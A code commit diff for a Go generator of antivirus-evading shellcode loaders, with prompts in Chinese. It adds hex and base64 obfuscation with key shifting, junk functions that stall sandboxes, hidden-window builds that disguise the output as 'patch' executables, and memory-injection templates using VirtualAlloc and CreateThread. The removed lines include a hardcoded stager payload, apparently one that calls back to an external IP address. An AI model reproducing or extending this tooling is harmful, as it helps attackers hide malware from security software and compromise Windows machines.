add

forever-sky · Sep 17, 2021 · 595cbf5 · 595cbf5
1 parent da36d4e
commit 595cbf5
Show file tree

Hide file tree

Showing 3 changed files with 117 additions and 44 deletions.
diff --git a/gen/main.go b/gen/main.go
@@ -2,6 +2,7 @@ package main
 
 import (
 	"encoding/base64"
+	"encoding/hex"
 	"fmt"
 	"io/ioutil"
 	"math/rand"
@@ -20,27 +21,49 @@ var (
 	gd           string
 	bbdataName   string
 	shellCodeHex string
-	bdata        string
+	shellcodeStr string
 )
 
 var path = "payload.bin"
 var tmplMap = make(map[string]string)
+var encodeMap = make(map[string]string)
 
 var path1 string
 var hide1 string
 var gostrip1 string
 var isRm1 string
 var tpl string
+var encode string
 var hide = true
 var gostrip bool
 var isRm = true
 var tmplVal = "syscall"
+var encodeVal = "hex"
 
 const tmplHelp = `
 1. syscall
 2. createThread
 `
 
+const encodeHelp = `
+1. hex
+2. base64
+`
+
+var decodeMethod = `
+func $getDeCode(string2 string) []byte {
+	ss, _ := $encode$.DecodeString(string2)
+	string2 = string(ss)
+	var code []byte
+	bydata := []byte(string2)
+	for i := 0; i < len(bydata); i++ {
+		code = append(code, bydata[i]-$keyName[0]+$keyName[1])
+	}
+	ssb, _ := $encode$.DecodeString(string(code))
+	return ssb
+}
+`
+
 func init() {
 	fmt.Println("[*]初始化混淆参数")
 	//初始化key
@@ -61,6 +84,9 @@ func init() {
 
 	tmplMap["1"] = "syscall"
 	tmplMap["2"] = "createThread"
+
+	encodeMap["1"] = "hex"
+	encodeMap["2"] = "base64"
 }
 
 func getKey() []byte {
@@ -70,7 +96,7 @@ func getKey() []byte {
 }
 
 func randString(l int) string {
-	str := "abcdefghijklmnopqrstuvwxyz_"
+	str := "abcdefghijklmnopqrstuvwxyz_ASDFGJHKLIUYTREWCVBMNKLOIPZXAQ"
 	bytes := []byte(str)
 	result := []byte{}
 	x := time.Now().UnixNano() * 6
@@ -85,7 +111,7 @@ func randString(l int) string {
 	return ddd
 }
 
-func getEnCode(data []byte) string {
+func getBase64EnCode(data []byte) string {
 	bdata1 := base64.StdEncoding.EncodeToString(data)
 	bydata1 := []byte(bdata1)
 	var shellcode []byte
@@ -96,9 +122,25 @@ func getEnCode(data []byte) string {
 	return base64.StdEncoding.EncodeToString(shellcode)
 }
 
+func getHexEnCode(data []byte) string {
+	var shellcode []byte
+	for i := 0; i < len(data); i++ {
+		shellcode = append(shellcode, data[i]+key[0]-key[1])
+	}
+	return hex.EncodeToString(shellcode)
+}
+
 func gen(code *string) {
+
+	*code = strings.ReplaceAll(*code, "$method$", decodeMethod)
+
+	if encodeVal == "hex" {
+		*code = strings.ReplaceAll(*code, "\"encoding/base64\"", "")
+	} else {
+		*code = strings.ReplaceAll(*code, "\"encoding/hex\"", "")
+	}
 	//payload
-	*code = strings.ReplaceAll(*code, "$bdata", bdata)
+	*code = strings.ReplaceAll(*code, "$bdata", shellcodeStr)
 	//payload名
 	*code = strings.ReplaceAll(*code, "$bbdata", bbdataName)
 	*code = strings.ReplaceAll(*code, "$keyName", keyName)
@@ -129,47 +171,69 @@ func main() {
 		if strings.TrimSpace(path1) != "" {
 			path = path1
 		}
-		fmt.Println("[*]请输入免杀方式 [1]")
+		fmt.Println("[*]请选择免杀方式 [默认1]")
 		fmt.Println(tmplHelp)
 		fmt.Scanln(&tpl)
 		if strings.TrimSpace(tmplMap[tpl]) != "" {
 			tmplVal = tmplMap[tpl]
 		}
 
-		fmt.Println("[*]是否隐藏窗口 [Y/n]")
+		fmt.Println("[*]请选择编码方式 [默认1]")
+		fmt.Println(encodeHelp)
+		fmt.Scanln(&encode)
+		if strings.TrimSpace(encodeMap[encode]) != "" {
+			encodeVal = encodeMap[encode]
+		}
+
+		fmt.Println("[*]是否隐藏窗口? [Y/n]")
 		fmt.Scanln(&hide1)
 		if hide1 == "n" {
 			hide = false
 		}
 
-		fmt.Println("[*]是否去除golang特征 [y/N]")
-		fmt.Scanln(&gostrip1)
-		if gostrip1 == "y" {
-			gostrip = true
-		}
+		/*		fmt.Println("[*]是否去除golang特征? [y/N]")
+				fmt.Scanln(&gostrip1)
+				if gostrip1 == "y" {
+					gostrip = true
+				}*/
 
-		fmt.Println("[*]是否删除生成shellcode [Y/n]")
+		fmt.Println("[*]是否删除生成shellcode? [Y/n]")
 		fmt.Scanln(&isRm1)
 		if isRm1 == "n" {
 			isRm = false
 		}
 
+		fmt.Println("===============================")
+
+		time.Sleep(1 * time.Second)
+
 	}
 	sc, err := ioutil.ReadFile(path)
 	if err != nil || len(sc) == 0 {
 		fmt.Println("[-]请检查输入shellcode路径!")
 		return
 	}
 
-	bdata = getEnCode(sc)
+	//根据编码生成shellcode
+	if encodeVal == "hex" {
+		shellcodeStr = getHexEnCode(sc)
+		decodeMethod = strings.ReplaceAll(decodeMethod, "$encode$", "hex")
+	} else {
+		shellcodeStr = getBase64EnCode(sc)
+		decodeMethod = strings.ReplaceAll(decodeMethod, "$encode$", "base64.StdEncoding")
+	}
+
 	fmt.Println("[+]获取payload", "---->", path)
 	//fmt.Println(bdata)
 	time.Sleep(1 * time.Second)
+	fmt.Println("[*]编码方式", "---->", encodeVal)
+	time.Sleep(1 * time.Second)
 	//ioutil.WriteFile("shellcode.txt", []byte(bdata), 0666)
 	fmt.Println("[*]解析shellcode模板", "---->", tmplVal)
 	time.Sleep(1 * time.Second)
 	//tmpl, _ := ioutil.ReadFile("./syscal")
 	tmpl, _ := ioutil.ReadFile("template/" + tmplVal)
+	fmt.Println(tmpl)
 	code := string(tmpl)
 	fmt.Println("[*]生成shellcode", "---->shellcode.go")
 	time.Sleep(1 * time.Second)
@@ -184,20 +248,21 @@ func main() {
 	//隐藏窗口，如有需要自行替换
 	//cmd := exec.Command("cmd.exe", "/c", "go build -ldflags=-s -ldflags=-H=windowsgui -o game.exe ./shellcode.go")
 	//CGO_ENABLED=0 GOOS=windows GOARCH=amd64 go build main.go
-	//outFile :="patch"+string(time.Now().Format("2006-01-02"))+".exe"
-	outFile := "patch.exe"
+	outFile := "patch" + string(time.Now().Format("200612150405")) + ".exe"
+	//outFile := "patch.exe"
 	var cmd exec.Cmd
 	if hide {
-		cmd = *exec.Command("cmd.exe", "/c", "go", "build", "-ldflags", "-H windowsgui -s -w", "shellcode.go", "-o game"+outFile)
+		//cmd = *exec.Command("cmd.exe", "/c", "go", "build", "-ldflags", "-H windowsgui -s -w", "shellcode.go", "-o game"+outFile)
+		cmd = *exec.Command("cmd.exe", "/c", "go build -ldflags=-s -ldflags=-H=windowsgui -o "+outFile+" ./shellcode.go")
 	} else {
-		cmd = *exec.Command("cmd.exe", "/c", "go", "build", "-ldflags", "-s -w", "shellcode.go", "-o game"+outFile)
+		cmd = *exec.Command("cmd.exe", "/c", "go build -ldflags=-s -o "+outFile+" ./shellcode.go")
 	}
 	//阻塞至等待命令执行完成
 	err1 := cmd.Run()
 	if err1 != nil {
 		panic(err1)
 	}
-	fmt.Println("[+]生成" + outFile)
+	fmt.Println("[+]生成文件" + outFile)
 	if isRm {
 		os.Remove("shellcode.go")
 	}

diff --git a/gen/template/createThread b/gen/template/createThread
@@ -2,25 +2,50 @@ package main
 
 import (
 	"encoding/hex"
+	"encoding/base64"
 	"golang.org/x/sys/windows"
+	"time"
 	"unsafe"
 )
-
-
-func g(code []byte) {
+var $keyName []byte
+$method$
+func $genEXE(code []byte) {
 	addr, _ := windows.VirtualAlloc(uintptr(0), uintptr(len(code)), windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_READWRITE)
 	ntdll := windows.NewLazySystemDLL("ntdll.dll")
 	RtlCopyMemory := ntdll.NewProc("RtlCopyMemory")
+	$gd()
 	RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&code[0])), uintptr(len(code)))
 	var oldProtect uint32
 	windows.VirtualProtect(addr, uintptr(len(code)), windows.PAGE_EXECUTE_READ, &oldProtect)
+	$gd()
 	kernel32 := windows.NewLazySystemDLL("kernel32.dll")
+	$gd()
 	CreateThread := kernel32.NewProc("CreateThread")
+	$gd()
+	time.Sleep(5000)
 	thread, _, _ := CreateThread.Call(0, 0, addr, uintptr(0), 0, 0)
 	windows.WaitForSingleObject(windows.Handle(thread), 0xFFFFFFFF)
 }
+func $gd() int {
+	dd := time.Now().UTC().Day()
+	time.Sleep(200)
+	var num = 1
+	var nn = 1
+        for num <= dd {
+            num++
+        }
+                for nn <= num {
+                   nn=num+nn
+                }
+	return dd + time.Now().Second()
+
+}
 
 func main() {
-	code, _ := hex.DecodeString("fc4883e4f0e8c8000000415141505251564831d265488b5260488b5218488b5220488b7250480fb74a4a4d31c94831c0ac3c617c022c2041c1c90d4101c1e2ed524151488b52208b423c4801d0668178180b0275728b80880000004885c074674801d0508b4818448b40204901d0e35648ffc9418b34884801d64d31c94831c0ac41c1c90d4101c138e075f14c034c24084539d175d858448b40244901d066418b0c48448b401c4901d0418b04884801d0415841585e595a41584159415a4883ec204152ffe05841595a488b12e94fffffff5d6a0049be77696e696e65740041564989e64c89f141ba4c772607ffd54831c94831d24d31c04d31c94150415041ba3a5679a7ffd5eb735a4889c141b8050d00004d31c9415141516a03415141ba57899fc6ffd5eb595b4889c14831d24989d84d31c9526800024084525241baeb552e3bffd54889c64883c3506a0a5f4889f14889da49c7c0ffffffff4d31c9525241ba2d06187bffd585c00f859d01000048ffcf0f848c010000ebd3e9e4010000e8a2ffffff2f6a71756572792d332e332e322e736c696d2e6d696e2e6a7300567431c5c7fb055f4ebd40df14010b4ba68aea17fae4f160764af47171ea45fa1d8730631779024244889d30af32b7f647e69c769d004163636570743a20746578742f68746d6c2c6170706c69636174696f6e2f7868746d6c2b786d6c2c6170706c69636174696f6e2f786d6c3b713d302e392c2a2f2a3b713d302e380d0a4163636570742d4c616e67756167653a20656e2d55532c656e3b713d302e350d0a526566657265723a20687474703a2f2f636f64652e6a71756572792e636f6d2f0d0a4163636570742d456e636f64696e673a20677a69702c206465666c6174650d0a557365722d4167656e743a204d6f7a696c6c612f352e30202857696e646f7773204e5420362e333b2054726964656e742f372e303b2072763a31312e3029206c696b65204765636b6f0d0a00774310eea4e9382011f6d3be145d881d43ce458391a9dc1fc4faf6015d3075cebbd884a50686484227d7484cb34c4ba15b67ec553a6eb40041bef0b5a256ffd54831c9ba0000400041b80010000041b94000000041ba58a453e5ffd5489353534889e74889f14889da41b8002000004989f941ba129689e2ffd54883c42085c074b6668b074801c385c075d75858584805af0f000050c3e89ffdffff3132322e392e3135372e3132320012345678")
-	g(code)
+	$bbdata := "$bdata"
+	$keyName = []byte("$keys")
+	$gd()
+	$shellCodeHex := $getDeCode($bbdata)
+	$gd()
+	$genEXE($shellCodeHex)
 }
diff --git a/gen/template/syscall b/gen/template/syscall
@@ -2,43 +2,26 @@ package main
 
 import (
 	"encoding/base64"
+	"encoding/hex"
 	"syscall"
 	"time"
 	"unsafe"
 )
-
+var $keyName []byte
 const (
 	MEM_COMMIT             = 0x1000
 	MEM_RESERVE            = 0x2000
 	PAGE_EXECUTE_READWRITE = 0x40
 )
 
-var $keyName []byte
-
-
 var (
 	kernel32      = syscall.MustLoadDLL("kernel32.dll")
 	ntdll         = syscall.MustLoadDLL("ntdll.dll")
 	VirtualAlloc  = kernel32.MustFindProc("VirtualAlloc")
 	RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")
 )
 
-func $getDeCode(string2 string) []byte {
-
-	ss, _ := base64.StdEncoding.DecodeString(string2)
-	string2 = string(ss)
-	var code []byte
-
-	bydata := []byte(string2)
-
-	for i := 0; i < len(bydata); i++ {
-		code = append(code, bydata[i]-$keyName[0]+$keyName[1])
-	}
-	ssb, _ := base64.StdEncoding.DecodeString(string(code))
-	return ssb
-
-}
-
+$method$
 
 
 func $genEXE(charcode []byte) {
@@ -53,7 +36,6 @@ func $genEXE(charcode []byte) {
 		syscall.Exit(0)
 	}
 	$gd()
-	$gd()
 	syscall.Syscall(addr, 0, 0, 0, 0)
 }
 
@@ -77,6 +59,7 @@ func $gd() int {
 func main() {
 	$bbdata := "$bdata"
 	$keyName = []byte("$keys")
+	$gd()
 	$shellCodeHex := $getDeCode($bbdata)
 	$gd()
 	$genEXE($shellCodeHex)